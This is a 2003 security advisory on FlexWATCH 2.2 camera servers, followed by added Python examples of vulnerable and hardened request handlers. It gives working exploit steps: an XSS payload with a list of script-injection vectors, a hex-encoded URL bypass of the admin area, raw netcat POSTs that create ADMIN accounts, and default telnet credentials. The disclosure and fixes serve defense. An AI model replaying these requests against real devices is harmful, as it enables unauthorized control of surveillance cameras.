Security_FlexWATCH-2.txt

Reported 15 Dec 2003 00:00:00 by Slaizer. Type: packetstorm. Source: packetstormsecurity.com

Unauthorized access vulnerability discovered in FlexWATCH Network Video Server version 2.2.

Code
`#=============================================================  
# Unauthorized Access vulnerability in FlexWATCH camera Server   
# Second Assault !  
#=============================================================   
  
  
Author: SLAIZER   
mail: slaizer[at]phreaker.net  
  
Vendor : SEYEON Technology  
System : FlexWATCH Network Video Server  
url : http://www.flexwatch.com/  
Mail: [email protected]  
  
Product Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003  
  
#====================  
# Introduction  
#====================  
  
A few months ago I published another document explaining how to obtain full access  
to the system in an easy and fast way.  
The same document was sent to SEYEON before being published; since I got no  
response from them, I decided to publish it. Two months after it was published,  
SEYEON got in touch with me. They asked me to test a new system already patched against  
the bugs I had told them I had found.  
They demanded that I remove the company's name from my previous document  
and that I not publish any more...  
In addition to doing work for the company, with many economic benefits for it, completely  
for free, which is something I do not accept. I will always be ready to help whoever needs  
it for free, as long as nothing is demanded of me, and much less so when proprietary  
software is involved. I'm sorry if it seems exaggerated, but nobody lives on air.  
  
  
#===================  
# Description   
#===================  
  
·Let's examine the new system!  
  
slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80  
  
HTTP/1.0 302 Redirect  
Server: FlexWATCH-Webs <---------- :) the same everlasting banner  
Date: Mon Dec 1 01:01:26 2003  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://victim/index.htm  
Age: 1  
  
  
·In the previous version I did not examine the services in use, because I did not need to :P.  
  
root@Necora:~$ nmap -sS -P0 victim   
Interesting ports on victim (censored :P):  
  
PORT STATE SERVICE  
21/tcp open ftp <-------   
23/tcp open telnet <------- Default user/pass are root/root :P   
80/tcp open http <------- They are not very interesting right now either,   
1024/tcp open kdm <------- but it would be nice if they used ssl :P.  
1755/tcp open wms <-------   
  
  
  
·It's time to look at the web application:  
  
·Browsing around the site, we see that the system has changed a bit as far as the   
directory tree goes, but otherwise it seems to be the same.  
  
The first thing we come across is a bug in the page responsible for telling us   
that the URL we want to access doesn't exist (404 error): a piece of XSS :P.  
  
Cross-Site Scripting .  
  
Example :  
  
mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>  
  
Results :  
  
Access Error: Page not found   
  
when trying to obtain /hehe.html  
  
cannot open URL /hehe.html  
  
( The code is executed perfectly; it is even executed twice, so at that moment two  
windows pop up alerting us with the message -Security ? ).  
  
View source :  
  
<html>  
<head>  
<title>Document Error: Page not found</title>  
</head>  
<body>  
<h2>Access Error: Page not found</h2>  
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>  
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>  
</body>  
</html>  
  
Note:   
  
This type of method is well known as a way to gain access to the system by means of malicious  
links that capture some user's identification.  
document.write / document.cookie / document.location..  
  
  
I list different JavaScript injection methods extracted from Globbes Security Advisory #33:  
  
<a href="javascript#[code]">  
<div onmouseover="[code]">  
<img src="javascript:[code]">  
<img dynsrc="javascript:[code]"> [IE]  
<input type="image" dynsrc="javascript:[code]"> [IE]  
<bgsound src="javascript:[code]"> [IE]  
&<script>[code]</script>  
&{[code]}; [N4]  
<img src=&{[code]};> [N4]  
<link rel="stylesheet" href="javascript:[code]">  
<iframe src="vbscript:[code]"> [IE]  
<img src="mocha:[code]"> [N4]  
<img src="livescript:[code]"> [N4]  
<a href="about:<script>[code]</script>">  
<meta http-equiv="refresh" content="0;url=javascript:[code]">  
<body onload="[code]">  
<div style="background-image: url(javascript:[code]);">  
<div style="behaviour: url([link to code]);"> [IE]  
<div style="binding: url([link to code]);"> [Mozilla]  
<div style="width: expression([code]);"> [IE]  
<style type="text/javascript">[code]</style> [N4]  
<object classid="clsid:..." codebase="javascript:[code]"> [IE]  
<style><!--</style><script>[code]//--></script>  
<![CDATA[<!--]]><script>[code]//--></script>  
<!-- -- --><script>[code]</script><!-- -- -->  
<script>[code]</script>  
<img src="blah"onmouseover="[code]">  
<img src="blah>" onmouseover="[code]">  
<xml src="javascript:[code]">  
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>  
<div datafld="b" dataformatas="html" datasrc="#X"></div>  
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]  
  
  
·The information the client sends to the server must always be verified; in this   
case the most obvious solution is to check that no malicious characters are inserted,  
for example by substituting them with their HTML equivalents.  
  
  
  
  
------------ u0xa ---------------  
  
  
  
·Where I want to get to right now is this url : admin/aindex.htm .  
That is where the system administration is found, so by trying and using some  
imagination I verify that it works when the request is sent in hexadecimal format.  
  
Example :  
  
  
  
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm  
  
------------ Url encode to hex mode ----------------  
  
http://victim/%61%64m%69n/a%69nde%78.%68t%6D  
  
-----------------By SLAIZER tools ------------------  
  
I obtain this in plain text :  
  
  
------ code -----  
<html>  
<head>  
<script language="Javascript">  
onBlur=self.focus()  
</script>  
<frameset cols="196,*" framespacing="0" frameborder="0">  
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">  
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">  
</frameset>  
</head>  
</html>  
----- code -----  
  
  
  
:D It's my friend the configuration frame, and it's in plain text ..  
We are on the right track; let's see whether we can do something with this.  
  
  
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm   
  
------------ Url encode to hex mode ----------------  
  
http://victim/adm%69%6E/%61%64%6D%69n.%68tm  
  
-----------------By SLAIZER tools ------------------  
  
  
This is where we are going to focus, so let's take a look at it!.  
  
Important links :  
_______________________  
|-Change Root | <---- /asp/pwdcfg.asp  
|Password configuration |   
| |  
|-Add User | <---- /asp/adduser.asp /* Let's go! */  
| |  
|-Delete User | <---- /asp/deluser.asp  
| |  
|-Access Level | <---- /asp/chglimit.asp  
|_______________________|   
  
  
  
slaizer@Necora:~$ nc victim 80   
  
POST /goform/AddUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 152  
Pragma: no-cache  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123  
&passconf=root123&group=POWER_USER&enabled=on&ok=OK  
  
  
----------- u0xa ------------  
  
<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>  
  
  
----------- u0xa ------------  
  
  
  
It seems that the POST went through correctly, but when trying to log in it shows us this error directly :  
  
Access Error: Forbidden  
  
When trying to obtain /admin/aindex.htm  
Access Denied Prohibited User .  
  
-------------------------------  
  
  
foh....but ... I log in at :  
  
http://victim/app/idxas.html <----- Camera Administration.   
  
Login : slaizer  
password: root123  
  
  
|o_O| <-hehe !! We already have access to all the cameras!!! using the login slaizer with pass root123   
that we added in the previous step. We have already taken a great step forward..  
  
  
But... the solution is simpler than it seems.. the added user belongs to POWER_USER; by now   
having this user is really more than enough, but it is enough for us to do one more test and  
add another user to the ADMIN group :  
  
Example  
  
slaizer@Necora:~$ nc victim 80   
  
POST /goform/AddUser HTTP/1.0  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*  
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/  
Accept-Language: es  
Content-Type: application/x-www-form-urlencoded  
Connection: Close  
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)  
Host: victim  
Content-Length: 147  
Pragma: no-cache  
  
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root  
&passconf=123root&group=ADMIN&enabled=on&ok=OK  
  
  
  
  
----------- u0xa ------------  
  
<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>  
  
  
----------- u0xa ------------  
  
For the moment, ok!.  
  
  
I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!!  
  
You can already do what you want in the system!!!  
  
The problem was that the /admin directory was no longer granting access to the users as it  
had been doing previously.  
  
  
#=========================  
# Solution :   
#=========================  
  
  
Always verify the type of request the client makes; as you can see, I have used a mixture of   
hexadecimal and ascii code.  
The best solution is to create authenticated sessions and to allow access to such directories   
according to the session.  
  
/* Note : log in at www.flexwatch.com as the technical e-mail support... xD */  
  
  
#========================  
# GreetSssSss!!!  
#========================  
  
- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu -   
  
- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD  
[[Irc-Hispano : #boinasnegras , #ngsec]]   
  
`
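The reflected 404 page shown in the advisory's "View source", as an added example that is not part of the advisory or the vendor's firmware: the vulnerable handler drops the requested path into the HTML verbatim (so the injected markup renders twice, once per reflection, as the advisory observes), and the hardened handler HTML-entity encodes it, which is the substitution the advisory recommends. The template text, the probe path and the helper names are constructed for this demo.

```python
# Added example (not from the advisory or the vendor): a 404 handler that
# reflects the requested path, in the vulnerable shape the advisory's
# "View source" shows, beside an output-encoded version.
import html

# Constructed template modelled on the advisory's error page; the path is
# reflected twice, which is why the advisory saw two alert windows.
TEMPLATE = (
    "<html><head><title>Document Error: Page not found</title></head>\n"
    "<body><h2>Access Error: Page not found</h2>\n"
    "when trying to obtain <b>{path}</b>\n"
    "<br><p>Cannot open URL <b>{path}</b></p>\n"
    "</body></html>"
)


def render_404_unsafe(path: str) -> str:
    """Vulnerable: the path is placed into the HTML exactly as received,
    so any markup carried in the URL is rendered by the browser."""
    return TEMPLATE.format(path=path)


def render_404_safe(path: str) -> str:
    """Hardened: every reflected occurrence is HTML-entity encoded.
    quote=True also encodes ' and ", so the same helper is safe for
    values that end up inside attribute values."""
    return TEMPLATE.format(path=html.escape(path, quote=True))


def raw_tag_count(page: str, tag: str = "<script>") -> int:
    """Number of times the raw tag survives in the rendered page
    (case-insensitive, so <SCRIPT> is counted too)."""
    return page.lower().count(tag.lower())


# Constructed probe modelled on the advisory's example URL (hypothetical value).
PROBE_PATH = "/hehe.html<H1><script>alert('Security?');</script>"

if __name__ == "__main__":
    print(raw_tag_count(render_404_unsafe(PROBE_PATH)))  # 2: reflected twice
    print(raw_tag_count(render_404_safe(PROBE_PATH)))    # 0
    print(render_404_safe(PROBE_PATH))
```

Encoding at the point of output (rather than trying to strip "bad" characters on input) is the durable fix: the list of injection vectors quoted above shows how many spellings of the same payload exist, and an entity-encoded path renders as text whichever of them is used.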
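The hex-encoded requests used against /admin and the advisory's closing advice (verify what the client sends, and tie access to those directories to a session), as an added example that is not the vendor's code: a request is authorized on its canonical, fully percent-decoded path and on the group stored for the caller's session, never on the raw request line or on the Referer header. The protected prefixes, the session groups, the bounded decoding loop and the helper names are assumptions made for this demo; `authorize_naive` models the raw-prefix check that the advisory's observations suggest, not the server's actual source.

```python
# Added example (not the vendor's code): authorize a request on its canonical,
# fully percent-decoded path and on the caller's session group, instead of on
# the raw request line or the Referer header. Prefixes, groups and names are
# assumptions for this demo.
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumption: the areas the advisory shows as administrative.
PROTECTED_DIRS = ("/admin", "/goform")


def canonical_path(raw_path: str, max_rounds: int = 3) -> str:
    """Strip the query string, percent-decode until the string stops changing
    (catches double encoding such as %2569 -> %69 -> i), then normalise
    '.', '..' and repeated slashes. Refuse input that keeps changing."""
    path = raw_path.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        raise ValueError("path did not stabilise after %d decoding rounds" % max_rounds)
    # lstrip avoids POSIX's special treatment of a leading "//"
    return posixpath.normpath("/" + path.lstrip("/"))


def is_protected(path: str) -> bool:
    return any(path == d or path.startswith(d + "/") for d in PROTECTED_DIRS)


def authorize_naive(raw_path: str, group: Optional[str]) -> bool:
    """Assumed model of the behaviour the advisory describes: the raw request
    line is compared against the protected prefixes, so an encoded spelling
    of /admin/... never matches and is let through."""
    if is_protected(raw_path):
        return group == "ADMIN"
    return True


def authorize(raw_path: str, group: Optional[str]) -> bool:
    """Hardened: decide on the canonical path and on the session's group.
    `group` is the role stored server-side for the caller's session
    (None = no session); it is never taken from the request itself."""
    try:
        path = canonical_path(raw_path)
    except ValueError:
        return False          # undecodable/unstable input is denied, not guessed at
    if is_protected(path):
        return group == "ADMIN"
    return True


if __name__ == "__main__":
    encoded = "/%61%64m%69n/a%69nde%78.%68t%6D"   # the advisory's spelling of /admin/aindex.htm
    print(canonical_path(encoded))                 # /admin/aindex.htm
    print(authorize_naive(encoded, None))          # True: the check is bypassed
    print(authorize(encoded, None))                # False
    print(authorize("/goform/AddUser", "POWER_USER"))  # False: only ADMIN may add users
```

Two details carry the weight here: the decode loop runs to a fixed point so a doubly encoded path cannot slip past a single `unquote`, and the decision uses a server-side session group, so neither the Referer header in the advisory's POST nor the `group=ADMIN` field in its body has any say in whether /goform/AddUser is reachable.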
